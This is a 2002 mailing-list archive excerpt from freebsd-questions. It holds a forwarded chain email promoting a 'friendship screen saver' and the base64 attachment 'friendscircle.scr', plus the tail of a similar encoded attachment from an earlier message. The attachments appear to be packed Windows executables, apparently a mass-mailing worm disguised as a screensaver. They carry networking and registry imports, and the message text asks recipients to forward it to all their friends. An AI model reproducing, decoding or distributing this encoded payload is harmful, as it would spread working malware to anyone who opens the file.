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 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAwAAACgAAIAOAAAAaAAAgBAAAACoAACAAAAAAAAAAAAA AAAAAAABAAEAAABAAACAAAAAAAAAAAAAAAAAAAABAAkEAABYAAAA7FABAOgCAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAQBsAAAAgAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAAmAAAANhTAQAUAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAMAAAIAAAAAAAAAAAAAAAAAAAAEACQQAANgAAADwUwEA KAMAAAAAAAAAAAAAGCQBACgAAAAgAAAAQAAAAAEABAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA/wD/AP// AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAPoAAAAAAAAAAAAAAAAAAAD6AAAAAAAAAAAAAAAAAAAPqqAAAAAAAAAAAAAAAAAAD6qgAAAA AAAAAAAAAAAAAPqqqgAAAAAAAAAAAAAAAAD6qqoAAAAAAAAAAAAAAAAPqqqqoAAAAAAAAAAAAAAA +qqqqqoAAAAAAAAAAAAAD6qqqqqqoAAAAAAAAAAAAA+qqqqqqqAAAAAAAAAAAAD6qqqqqqqqAAAA AAAAAAAPqqqqqqqqqqAAAAAAAAAA+qqqqqqqqqqqAAAAAAAAD6qqqqqqqqqqqqAAAAAAAPqqqqqq qqqqqqqqAAAAAAD6qqqqqqqqqqqqqgAAAAAPqqqqqqqqqqqqqqqgAAAAD6qqqqqqqqqqqqqqoAAA APqqqqqqqqqqqqqqqqoAAAD6qqqqqqqvqqqqqqqqAAAA+qqqqqqqAPqqqqqqqgAAAPqqqqqqqgD6 qqqqqqoAAAAPqqqqqqAAD6qqqqqgAAAAD6qqqqqgAA+qqqqqoAAAAAD/qqqqAAAA/6qqqgAAAAAA AP///wAAAAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAD//////////////////H////x////4P///+D////Af///wH///4A///8AH//+AA///gAP/ /wAB//4AAP/8AAB/+AAAP/AAAB/wAAAf4AAAD+AAAA/AAAAHwAAAB8ABAAfAAQAH4AOAD+ADgA/w B8Af/A/wP////////////////wAnAQAAAAEAAQAgIBAAAQAEAOgCAAABAPAgAQAoAzQAAABWAFMA XwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAUAAgAAAAAABQACAAAAPwAA AAAAAAAEAAQAAQAAAAAAAAAAAAAAAAAAAIgCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYA bwAAAGQCAAABADAANAAwADkAMAA0AGIAMAAAADIADQABAEMAbwBtAG0AZQBuAHQAcwAAAFMAYwBy AGUAZQBuACAAUwBhAHYAZQByAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAHcA dwB3AC4AcwBjAHIAZQBlAG4AcwBhAHYAZQByAC4AYwBvAG0AAABCAA0AAQBGAGkAbABlAEQAZQBz AGMAcgBpAHAAdABpAG8AbgAAAAAAUwBjAHIAZQBlAG4AIABTAGEAdgBlAHIAAAAAADYACwABAEYA aQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAsACAAMAAsACAAMAAsACAAMgAAAAAAIAAAAAEASQBu AHQAZQByAG4AYQBsAE4AYQBtAGUAAABGABEAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAyADAAMAAyAAAAAAAoAAAAAQBMAGUAZwBhAGwAVABy AGEAZABlAG0AYQByAGsAcwAAAAAAKAAAAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0A ZQAAACAAAAABAFAAcgBpAHYAYQB0AGUAQgB1AGkAbABkAAAAIAAAAAEAUAByAG8AZAB1AGMAdABO AGEAbQBlAAAAAAA6AAsAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAA1ACwAIAAwACwA IAAwACwAIAAyAAAAAAAgAAAAAQBTAHAAZQBjAGkAYQBsAEIAdQBpAGwAZAAAAEQAAAABAFYAYQBy AEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBLAE AAAAAAAAAAAAAAAA+FcBALhXAQAAAAAAAAAAAAAAAAAFWAEAyFcBAAAAAAAAAAAAAAAAABJYAQDQ VwEAAAAAAAAAAAAAAAAAHFgBANhXAQAAAAAAAAAAAAAAAAAkWAEA4FcBAAAAAAAAAAAAAAAAAC9Y AQDoVwEAAAAAAAAAAAAAAAAAO1gBAPBXAQAAAAAAAAAAAAAAAAAAAAAAAAAAAEZYAQBUWAEAZFgB AAAAAAByWAEAAAAAAIBYAQAAAAAAiFgBAAAAAACYWAEAAAAAAKBYAQAAAAAAdAAAgAAAAABLRVJO RUwzMi5ETEwAQURWQVBJMzIuZGxsAEdESTMyLmRsbABNUFIuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAEV4aXRQcm9j ZXNzAAAAUmVnQ2xvc2VLZXkAAABCaXRCbHQAAFdOZXRDbG9zZUVudW0AAABHZXREQwAAAEludGVy bmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAARt337bgnIyNXTLm6qxj1SJtrQAnehn09rlE/mGBnQ3SxqXSEwTxJXDhhw2ER9wa7DHrMqIYG n1M4al+tXqnzZGWnUTkJOnafMDNTsfDp4WocLHi1yObsQfVxOE8m38UGuk9Hu2Sinsj4fp2T1OyC NDSF9McgTxPoHGpm6U7j2aNoTxLfKRULj3aSC9eQwUXQT9Xwud4VFrQpr9fgTG7SXWmfNXl3sJk5 ksOulNEG8XFR9PN8FPSTtMXdKOgjIKqHyZ5SgES8pITNC+jLLT7sEX3osRtsg5RtBQ0hjYlXC27n IQv4ITPf14qAy9WlwfIFSRCUn28xuDfFiU6kHD/Yv2Io2R1V3qU+ibWRARqlRkdkIEU9MB7WrZ4I eOnlBJvB5SBQJuB8j0fPmEF+MgqEm5tFE0GWjXhj86ARaxuCQ3uE1cZWpYPpLH9aDPUiwvUcJNSZ GjtMdjicrcoR --snccfju-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12: 0: 1 2002 Delivered-To: freebsd-questions@freebsd.org Received: from eomer.vianetworks.nl (eomer.vianetworks.nl [212.61.15.10]) by hub.freebsd.org (Postfix) with ESMTP id 2A70137B6D3 for ; Tue, 25 Jun 2002 11:58:59 -0700 (PDT) Received: from mail.iaehv.nl (pm17d290.iae.nl [212.61.5.36]) by eomer.vianetworks.nl (Postfix) with SMTP id 0A0D8211DA for ; Tue, 25 Jun 2002 20:58:46 +0200 (CEST) From: Edwin Renders To: questions@FreeBSD.org Subject: Fw: Interesting Love to enjoy ! Date: Tue,25 Jun 2002 21:00:33 PM X-Mailer: Microsoft Outlook Express 5.50.4133.2400 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=snccfju Message-Id: <20020625185846.0A0D8211DA@eomer.vianetworks.nl> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --snccfju Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi
Check the Attachement ..

Edwin Renders

----- Original Message -----
From: "truefriends" < friendshipbird@freescreensaver.com >
To: < erenders@iaehv.nl >
Sent: Tue,25 Jun 2002 21:00:33 PM
Subject: Interesting Love to enjoy !


This e-mail is never sent unsolicited. If you need to unsubscribe,
follow the instructions at the bottom of the message.
***********************************************************

Enjoy this friendship Screen Saver and Check ur friends circle...

Send this screensaver from www.freescreensaver.com to everyone you
consider a FRIEND, even if it means sending it back to the person
who sent it to you. If it comes back to you, then you'll know you
have a circle of friends.

* To remove yourself from this mailing list, point your browser to:
http://freescreensaver.com/remove?freescreensaver
* Enter your email address (erenders@iaehv.nl) in the field provided and click "Unsubscribe".

OR...

* Reply to this message with the word "REMOVE" in the subject line.

This message was sent to address erenders@iaehv.nl
X-PMG-Recipient: erenders@iaehv.nl
<<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>>
--snccfju Content-Type: application/octet-stream; name=friendscircle.scr Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="friendscircle.scr" TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAABXZioCEwdEURMHRFETB0RRkBtKUR4HRFH7GE5RCQdEURMHRFEQB0RRcRhX UR4HRFETB0VRkAdEUfsYT1EWB0RRqwFCURIHRFFSaWNoEwdEUQAAAAAAAAAAUEUAAEwBAwC+0QI9 AAAAAAAAAADgAA8BCwEGAABgAAAAEAAAAOAAAABLAQAA8AAAAFABAAAAQAAAEAAAAAIAAAQAAAAA AAAABAAAAAAAAAAAYAEAAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA AAAYVwEApAEAAABQAQAYBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAuLi4wAAAAAADgAAAAEAAAAAAAAAAEAAAAAAAAAAAAAAAAAACAAADgLi4uMQAAAAAA YAAAAPAAAABeAAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAAABAAAABQAQAACgAAAGIAAAAA 